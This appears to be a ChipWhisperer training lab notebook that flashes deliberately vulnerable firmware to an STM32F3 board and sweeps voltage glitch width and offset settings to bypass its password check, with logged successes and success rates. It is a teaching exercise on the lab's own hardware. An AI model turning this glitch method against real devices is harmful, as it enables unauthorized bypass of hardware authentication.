# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F3'
SS_VER = 'SS_VER_2_1'

In [2]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

INFO: Found ChipWhisperer😍
scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 11762174                  to 24268508                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 60067359                  to 54334899                 
scope.clock.adc_rate                     changed from 60067359.0                to 54334899.0        

In [3]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j

SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
make[1]: '.dep' is up to date.
SS_VER set to SS_VER_2_1
SS_VER set to SS_VER_2_1
arm-none-eabi-gcc (15:10.3-2021.07-4) 10.3.1 20210621 (release)
Copyright (C) 2020 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Welcome to another exciting ChipWhisperer target build!!
.
Assembling: .././hal/stm32f3/stm32f3_startup.S
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -fmessage-length=0 -ffunction-sections -DF_CPU=7372800 -Wa,-gstabs,-adhlns=objdir-CW308_STM32F3/stm32f3_startup.lst -I.././simpleserial/ -I.././simpleserial/ -I.././hal -I.././hal/stm32f3 -I.././hal/stm32f3/CMSIS -I.././hal/stm32f3/CMSIS/core -I.././hal/stm32f3/CMSIS/device -I.././hal/stm32f4/Legacy -I.././crypto/ .././hal/stm32f3/stm32f3_startup.S -o obj

In [4]:
fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER=="SS_VER_2_1":
    target.reset_comms()

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to program 5671 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 5671 bytes


In [5]:
def reboot_flush():
    reset_target(scope)
    target.flush()
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
elif (PLATFORM == "CWLITEARM") or ("F3" in PLATFORM):
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37
    

In [6]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}


Like with clock glitching, the scope object can set some typical glitch settings for you:

In [7]:
if scope._is_husky:
    scope.vglitch_setup('hp', default_setup=False) # HP alone works best for Husky
else:
    scope.vglitch_setup('both', default_setup=False) # use both transistors

In [8]:
print(scope.io.hs2)

clkgen


In [9]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

In [10]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None})

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [width,offset]
      .Points.II :Points   [width,offset]

In [11]:
if scope._is_husky:
    gc.set_range("width", 1900, 1901)
    gc.set_range("offset", 2000, 2500)
    gc.set_global_step([50])
    gc.set_step("ext_offset", 1)
else:
    if PLATFORM=="CWLITEXMEGA":
        gc.set_range("width", 43.5, 47.8)
        gc.set_range("offset", -48, -10)
        #gc.set_range("ext_offset", 7, 10)
        gc.set_range("ext_offset", 30, 45)
        scope.glitch.repeat = 11
    elif PLATFORM == "CWLITEARM":
        #should also work for the bootloader memory dump
        gc.set_range("width", 30.7, 36)
        gc.set_range("offset", -40, -35)
        gc.set_range("ext_offset", 0, 150)
        gc.set_global_step(0.4)
        gc.set_step("ext_offset", 1)
        scope.glitch.repeat = 7
    elif PLATFORM == "CW308_STM32F3":
        #these specific settings seem to work well for some reason
        #also works for the bootloader memory dump
        # gc.set_range("ext_offset", 11, 31)
        gc.set_range("ext_offset", 11, 45)
        gc.set_range("width", 43.6, 46.4)
        # gc.set_range("offset", -19, -21.5)
        gc.set_range("offset", -35, -15)
        gc.set_global_step(0.4)
        gc.set_step("ext_offset", 1)
        scope.glitch.repeat = 5
        
# gc.set_range("ext_offset", 0, 150)
# gc.set_step("ext_offset", 1) # check each clock cycle


In [12]:
#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)

scope.adc.timeout = 0.1
successes = 0

reboot_flush()

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        #print("Trigger still high!")
        gc.add("reset")
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0]*5))
    ret = scope.capture()
    scope.io.vglitch_reset()
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50)#For loop check
        if val['valid'] is False:
            gc.add("reset")
        else:
            if val['payload'] == bytearray([1]): #for loop check
                successes +=1 
                gc.add("success")
                print(val)
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal")
                    
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
43.75 -21.09375 26
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
44.140625 -29.6875 16
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
44.140625 -27.734375 26
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
44.140625 -26.953125 16
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
44.140625 -26.5625 26
🐙{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
44.140625 -26.171875

Let's see where we needed to target for our glitch to work:

In [13]:
gc.calc(["width", "offset"], "success_rate")

[((37,),
  {'total': 685,
   'success': 19,
   'success_rate': 0.027737226277372264,
   'reset': 466,
   'reset_rate': 0.6802919708029197,
   'normal': 200,
   'normal_rate': 0.291970802919708}),
 ((16,),
  {'total': 716,
   'success': 15,
   'success_rate': 0.02094972067039106,
   'reset': 563,
   'reset_rate': 0.7863128491620112,
   'normal': 138,
   'normal_rate': 0.19273743016759776}),
 ((26,),
  {'total': 721,
   'success': 15,
   'success_rate': 0.020804438280166437,
   'reset': 574,
   'reset_rate': 0.7961165048543689,
   'normal': 132,
   'normal_rate': 0.18307905686546463}),
 ((27,),
  {'total': 668,
   'success': 13,
   'success_rate': 0.019461077844311378,
   'reset': 419,
   'reset_rate': 0.6272455089820359,
   'normal': 236,
   'normal_rate': 0.3532934131736527}),
 ((17,),
  {'total': 658,
   'success': 11,
   'success_rate': 0.016717325227963525,
   'reset': 421,
   'reset_rate': 0.6398176291793313,
   'normal': 226,
   'normal_rate': 0.3434650455927052}),
 ((36,),
  {'to

In [15]:
gc.plot_2d(alpha=False)

:Overlay
   .Points.I       :Points   [x,y]
   .Points.Success :Points   [width,offset]   (success_rate)
   .Points.Reset   :Points   [width,offset]   (reset_rate)

In [14]:
scope.dis()
target.dis()